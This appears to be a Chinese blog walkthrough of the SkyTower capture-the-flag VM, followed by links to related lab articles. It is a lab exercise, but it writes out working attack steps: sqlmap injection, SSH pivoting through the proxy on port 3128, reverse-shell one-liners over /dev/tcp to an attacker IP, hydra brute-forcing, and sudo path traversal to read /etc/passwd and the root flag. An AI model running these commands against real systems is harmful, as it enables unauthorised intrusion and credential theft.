sky tower靶机

最新推荐文章于 2024-10-04 20:38:10 发布
最新推荐文章于 2024-10-04 20:38:10 发布
阅读量361 收藏 8
点赞数 5
文章标签: 网络 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73074638/article/details/140868728
版权

1.信息收集

主机发现

22端口为过滤状态

访问3128端口

这里应该提示管理员用户为webmaster

访问80端口发先登陆框,burp抓包测试,同时进行目录扫描未发现有用信息

wapplazer指纹识别

输入单引号产生数据库报错,利用sqlmap梭哈

看文档新学绕过方式

账号密码john / hereisjohn

2.getshell

3128端口是一个代理端口

步骤:1.vim /etc/proxychains.conf

把里面的socks注释掉再添加一条

http 192.168.1.61 3128

2.

proxychains nmap -PN 192.168.1.61 -p22 --min-rate 3000 -sT

3.尝试登陆发现调出来了

proxychains ssh john@192.168.1.4

4.尝试进行ssh登陆时可以携带一条指令

proxychains ssh john@192.168.7.61 whoami

5.尝试反弹shell

新开终端监听

nc -lvvp 4444

proxychains ssh john@192.168.7.61 "sh -i >& /dev/tcp/192.168.7.67/4444 0>&1"

ls -al

mv .bashrc .bashrc.bak

尝试重新链接

proxychains ssh john@192.168.7.61

3.提权

cd /var/www

ls-al

cat login.php

发现数据库账号密码为root/root

进行数据库链接 mysql -u root -p

查看数据库 show databases; use SkyTech

查看数据标 show tables;

查看表中数据 select * from login;

保存账号密码使用九头she爆破

proxychains hydra -L username.txt -P passwd.txt ssh://192.168.7.61 -v

使用sara登录还是掉出来了,再重新套路来一遍

vproxychains ssh sara@192.168.7.61"sh -i >& /dev/tcp/192.168.7.67/8080 0>&1"

mv .bashrc .bashrc.bak

sudo -l

sudo /bin/cat /accounts/ ../../etc/passwd

sudo /bin/ls /accounts/ ../../root

sudo /bin/cat /accounts/ ../../root/flag.txt

su root 然后输入密码

pingyao周杰伦
关注
CTF6靶机实战
千寻的博客
05-25 1725
文章目录总结CTF6靶机下载地址环境搭建靶机实战信息收集漏洞查找漏洞利用提权摘抄 总结 信息搜集,端口扫描,目录扫描,获取敏感目录和压缩包文件 下载源代码,进行审计代码,得到数据库账号和密码(发现账号和密码,其实和敏感目录下的一样) 敏感目录下,获取账号和密码(发现是主页的登陆账号密码) 使用msf生成php反向shell,通过文件上传漏洞上传shell,并访问进行触发 寻找Linux内核漏洞exp,提权root CTF6靶机下载地址 https://download.vulnhub.com/lamps
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
metasploitable3靶机
雨泽网络工作室
08-23 2008
Metasploitable3靶机攻击 注:这些密码都是参考网站https://github.com/rapid7/metasploitable3/wiki/Configuration#credentials 21端口ftp 使用nmap扫描发现21端口打开 通过msfconsole 调出metasploit 使用ftp_login模块 使用set设置参数 使用run进行攻击 登录 22端口ssh 通过nmap扫描发现22端口开启 爆破s..
metasploitable2靶机
雨泽网络工作室
08-16 4941
一、Metasploitable2简介 Metasploitable2虚拟系统是一个特别制作的ubuntu操作系统,本身设计目的是作为安全工具测试和演示常见漏洞攻击的环境。其中最重要的是可以用来作为MSF攻击用的靶机。 开放了很多的高危端口如21、23、445等,而且具有很多未打补丁的高危漏洞, 如Samba MS-RPC Shell命令注入漏洞等,而且对外开放了很多服务,并且数据库允许外联等。系统中的用户口令均为弱口令。系统搭载了DVWA、Mutillidae等Web漏洞演练平台。 使用方法
搭建Metasploitable靶机
yzl_007的博客
08-07 1284
搭建Metasploitable靶机 开始本机下载后来解压直接报毒,上虚拟机操作(windows10) https://github.com/rapid7/metasploitable3 下载好压缩包后通过共享文件传到虚拟机上 下载packer(推荐1.35,报错更换版本) https://releases.hashicorp.com/packer/ 安装好你想要的版本后将exe文件放在想要的地方,然后添加上环境变量 例如虚拟机中是如下位置 在环境变量path里添加上即可 然后cmd packer
安装metasploitable靶机
qq_51478862的博客
04-26 2480
1下载地址:https://sourceforge.net/projects/metasploitable/ 下载好加压后,最好保存在虚拟机的目录下,好方便管理。 2·打开虚拟机,点文件中的扫描 扫描的位置要选择你保存有靶机的目录 3.然后扫描到虚拟机后点完成 4.点关闭后就安装好了 5.配置不用更改,够使用的。然后运行虚拟机 打开后选择我已复制。。 6.然后会显示让我们登录的页面 7. 这句话的意思就是用户名与密码是msfadmin 8.注意:他这个密码是没有任何回显的。登录成功后是是这个
docker搭建靶机
Z_Grant的博客
09-21 3710
文章目录一,docker(1)基础概念(2)安装docker(3)docker命令 一,docker (1)基础概念 沙箱机制 1.沙箱是一个虚拟系统程序,沙箱提供的环境相对于每一个运行的程序都是独立的,而且不会对现有的系统产生影响. 2.沙箱具有非常良好的独立性、隔离性,所以能够搭建一些具有高风险的软件进行测试. docker 一个开源的应用容器引擎,基于GO语言 作用:开发者打包他...
Vulnhub靶机_Deathnote
学术渣渣的博客
09-12 1953
文章目录靶机介绍渗透过程获取靶机IP端口扫描dirb扫描网站目录信息1信息2信息3登录wordpresshydra 爆破密码提权 靶机介绍 下载地址: http://www.vulnhub.com/entry/deathnote-1,739/ 难度:简单 介绍: don’t waste too much time thinking outside the box . It is a Straight forward box . 渗透过程 获取靶机IP arp-scan -l 得到靶机的IP为:192.1
DC-4靶机
mlws1900的博客
03-24 1188
下载不下来用迅雷下载。
DC-6靶机攻略
真正的大师,永远都怀着一颗学徒的心。
08-01 2078
文章目录前言一、信息收集1,确定IP以及开放端口2,访问对方80端口3,登入对方后台二、反弹shell与提权1.得到SSH账号2.登陆对方SSH3,切换用户并提权 前言 DC-1靶机攻略 DC-2靶机攻略 DC-4靶机攻略 本篇将介绍DC-6的靶机攻略 一、信息收集 1,确定IP以及开放端口 2,访问对方80端口 这里和DC-2很像,直接输入IP无法访问80,需要配置etc/hosts文件 配置后成功进入目标网站,发现是由WordPress搭建。直接上WPscan WPScan是Kali Linu
vulnhub靶机:FunBox
Keepb1ue的博客
09-28 3123
靶机配置说明: 靶机下载地址:https://www.vulnhub.com/entry/funbox-1,518/ 靶机:DC1 (VirtualBox) IP:192.168.56.109 攻击机:Kali(VMware) IP:192.168.56.108 在下载地址中有也有详细的靶机说明,而FunBox需要寻找的flag总数为1个。 靶机环境配置: 将靶机和kali都桥接到同一张网卡即可,这里我都桥接到virtualBox的Host-only网卡,保证无干扰目标。 靶机渗透开始: 先看下手里的
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
OWASP靶机安全学习、测试
05-24
这里提供的是owasp靶机的下载,下载后直接在虚拟机导入即可使用 OWASP靶机是一个开放式Web应用程序安全项目组织,旨在帮助计算机和互联网应用程序提供公正、实际、有成本效益的信息。在信息安全中OWASP TOP 10 是...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
组播基础-1
DC_BLOG的博客
09-27 872
信息的发送者为:组播源 接受相同信息的接收者构成一个组播组,并且每个接收者都是组播组成员 提供组播功能的路由器成为:组播组路由器 组播路由器不仅提供组播路由功能,也提供组成员管理功能,也可以是组播组成员
毕业设计——springboot+netty+websocket实现一个简单的ChatGpt机器人聊天
【CSDN】
09-29 709
WebSocket是html5开始浏览器和服务端进行全双工通信的网络技术。在该协议下,与服务端只需要一次握手,之后建立一条快速通道,开始互相传输数据,实际是基于TCP双向全双工,比http半双工提高了很大的性能,常用于网络在线聊天室等。申请key的教程在项目resources目录readme.md文件中。1、接入了chatGpt接口,只需要替换成自己的key就行。2、实现了与机器人的聊天,可以优化做成智能客服。
项目管理-信息技术发展
GAVIN
10-04 196
对称加密:DES 3DES AES RC5 IEDA SM1 SM4。2)分类:PAN LAN MAN WAN 公用网 专用网。4)数据结构模型 层次模型 网状模型 关系模型。1)存储 分类:DAS FAS NAS SAN。物联网(IoT) 感知层 网络层 应用层。8) 5G 高速率 低时延 大连接。设备安全 数据安全 内容安全 行为安全。4.信息安全 保密性 完整性 可用性。3)网络协议 语法 语义 时许。5)IEEE 802 规范。6)TCP/IP 协议。4)网络标准协议 7层。
Mac ToDesk 无法连接网络
最新发布
Primer5
10-04 85
检查登录项,看到后台运行项目是关闭状态,允许后台运行之后返回查看立马显示网络连接正常。网络连接的是 Wi-Fi,打开浏览器能跟正常浏览内容,说明 Wi-Fi 是正常的。检查防火墙是没有阻止ToDesk 的任何连接,说明防火墙也是正常的。
Windows2008服务器上搭建五种靶机教程
"该资源是一份关于如何搭建五种不同靶机的教程,由张学飞撰写,主要针对Windows 2008服务器环境。涉及的靶机包括DVWA(Damn Vulnerable Web Application)、MCIR、Pikachu、mutillidae以及bWAPP。这些靶机主要用于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值